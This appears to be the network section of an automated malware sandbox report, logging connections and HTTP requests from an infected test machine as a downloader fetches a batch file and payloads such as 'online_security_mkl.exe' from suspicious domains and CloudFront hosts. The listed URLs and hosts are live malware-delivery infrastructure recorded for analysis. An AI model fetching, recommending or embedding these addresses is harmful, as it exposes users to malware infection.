Network Analysis
- TCP Requests
-
-
192.168.56.101:49172 104.21.11.117:443cdn-edge-node.com
-
192.168.56.101:49180 104.21.43.83:443adblock2024.shop
-
192.168.56.101:49182 121.254.136.9:80apps.identrust.com
-
192.168.56.101:49167 13.225.110.102:443d22hce23hy1ej9.cloudfront.net
-
192.168.56.101:49171 13.225.110.102:443d22hce23hy1ej9.cloudfront.net
-
192.168.56.101:49181 13.225.110.102:443d22hce23hy1ej9.cloudfront.net
-
192.168.56.101:49163 18.64.13.155:443d2csnxzxwctx26.cloudfront.net
-
192.168.56.101:49183 94.156.35.76:80240429000936002.mjt.kqri92.top
-
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:61950 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:61953 239.255.255.250:1900
-
192.168.56.103:137 192.168.56.101:137
-
GET
200
https://d2csnxzxwctx26.cloudfront.net/load/load.php?c=1002
REQUEST
RESPONSE
BODY
GET /load/load.php?c=1002 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2csnxzxwctx26.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Sun, 19 May 2024 01:32:31 GMT
X-Powered-By: PHP/5.5.38
Content-Description: File Transfer
Content-Disposition: attachment; filename="load.bat"
X-Cache: Miss from cloudfront
Via: 1.1 88978ba000ab6fbb0841a728290a8442.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ICN57-P2
X-Amz-Cf-Id: nDs2jdV9bksewfmMrdxg_QYciUwEJ9gJaAy_ubLxkBmXRZK0_0Drgw==
GET
200
https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
REQUEST
RESPONSE
BODY
GET /load/th.php?a=2836&c=1002 HTTP/1.1
Host: d22hce23hy1ej9.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Sun, 19 May 2024 01:32:34 GMT
X-Powered-By: PHP/5.5.38
X-Cache: Miss from cloudfront
Via: 1.1 da2c164b1f4a215d9eb34f9c8a35ee3c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ICN54-C1
X-Amz-Cf-Id: eRC4TPpNTEBifFsQGYBxgoM2Tr0Q9VFIba448kfYPRoPiKXQV7X_QQ==
GET
302
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002
REQUEST
RESPONSE
BODY
GET /load/dl.php?id=458&c=1002 HTTP/1.1
Host: d22hce23hy1ej9.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Sun, 19 May 2024 01:32:36 GMT
X-Powered-By: PHP/5.5.38
Location: https://cdn-edge-node.com/online_security_mkl.exe
X-Cache: Miss from cloudfront
Via: 1.1 476f8319bb51299b893d2257510c5dd0.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ICN54-C1
X-Amz-Cf-Id: rehLwNMLFDcCwgSxGmE6AwNQuDkXxrWTYFXYU06fQ1wzz7Bsd9s5xg==
GET
200
https://cdn-edge-node.com/online_security_mkl.exe
REQUEST
RESPONSE
BODY
GET /online_security_mkl.exe HTTP/1.1
Host: cdn-edge-node.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 19 May 2024 01:32:36 GMT
Content-Type: application/octet-stream
Content-Length: 3711543
Connection: keep-alive
Last-Modified: Fri, 26 Apr 2024 08:50:55 GMT
ETag: "662b6aef-38a237"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 2218
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5vfBNWpA8%2BLMsHhaFAjpGz9dpYpl8YeMVEtGm0gqJ09YVtkiyy0MgoEIyO%2Fo3FvOSLT4n7tpRi%2B3Jjf%2FS0tvkN3Rjd0ClTISPzMXKy%2B0kHhADRuFvTDQW49BBysHlA%2F9NMIvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88605589bcd52f15-LAX
alt-svc: h3=":443"; ma=86400
GET
302
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002
REQUEST
RESPONSE
BODY
GET /load/dl.php?id=444&c=1002 HTTP/1.1
User-Agent: InnoDownloadPlugin/1.5
Host: d22hce23hy1ej9.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Sun, 19 May 2024 01:32:39 GMT
X-Powered-By: PHP/5.5.38
Location: http://240429000936002.mjt.kqri92.top/f/fvgbm0428902.txt
X-Cache: Miss from cloudfront
Via: 1.1 fbb22360028e181171037fd6d6a9e41c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ICN54-C1
X-Amz-Cf-Id: ZhGnKi5GqoENYdt4ZR99qOI4hwDIsGtPoRAFXUT5LsOSz86PAnrSJQ==
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Sun, 19 May 2024 02:32:39 GMT
Date: Sun, 19 May 2024 01:32:39 GMT
Connection: keep-alive
GET
404
http://240429000936002.mjt.kqri92.top/f/fvgbm0428902.txt
REQUEST
RESPONSE
BODY
GET /f/fvgbm0428902.txt HTTP/1.1
User-Agent: InnoDownloadPlugin/1.5
Host: 240429000936002.mjt.kqri92.top
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Caddy
Status: 404 Not Found
X-Powered-By: PHP/7.3.25
Date: Sun, 19 May 2024 01:32:41 GMT
Content-Length: 17
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.101:49172 104.21.11.117:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=cdn-edge-node.com | 91:0f:27:57:ee:98:f8:5f:d5:7c:7c:6c:88:dd:0b:40:d7:4a:45:06 |
|
TLSv1 192.168.56.101:49163 18.64.13.155:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
|
TLSv1 192.168.56.101:49167 13.225.110.102:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
|
TLSv1 192.168.56.101:49171 13.225.110.102:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
|
TLSv1 192.168.56.101:49181 13.225.110.102:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
|
TLSv1 192.168.56.101:49180 104.21.43.83:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=adblock2024.shop | f6:53:16:b6:98:89:7a:ae:57:00:89:be:e1:b6:81:59:8e:db:ed:ab |
Snort Alerts
No Snort Alerts